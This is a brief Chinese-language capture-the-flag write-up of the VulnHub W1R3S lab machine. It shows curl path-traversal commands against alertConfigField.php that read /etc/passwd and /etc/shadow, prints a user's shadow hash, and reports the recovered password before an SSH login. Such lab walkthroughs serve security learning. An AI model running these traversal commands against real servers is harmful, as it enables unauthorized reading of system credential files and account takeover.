2021年1月2日-VulnHub-W1R3S 渗透学习

VulnHub-W1R3S 渗透学习

靶机下载地址：https://www.vulnhub.com/entry/w1r3s-101,220/

kali地址：192.168.31.77

靶机IP地址：192.168.31.11

一、信息收集

使用dirb 爆破目录

curl是一个命令行工具，可用于在网络上传输数据。

它支持许多现成的协议，包括HTTP，HTTPS，FTP，FTPS，SFTP，IMAP，SMTP，POP3等。

在调试网络请求时，curl是您可以找到的最佳工具之一。

curl使用 教程 https://flaviocopes.com/http-curl/

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.31.11/administrator/alerts/alertConfigField.php

然后我再次执行以下命令，使用相同的过程获取密码文件。

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.31.11/administrator/alerts/alertConfigField.php

将 w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::

复制到一个 pass.txt 文本文件中

得到w1r3s 的密码computer

使用 ssh登录

获得flag.txt

获得flag.txt

这个靶机还是比较简单的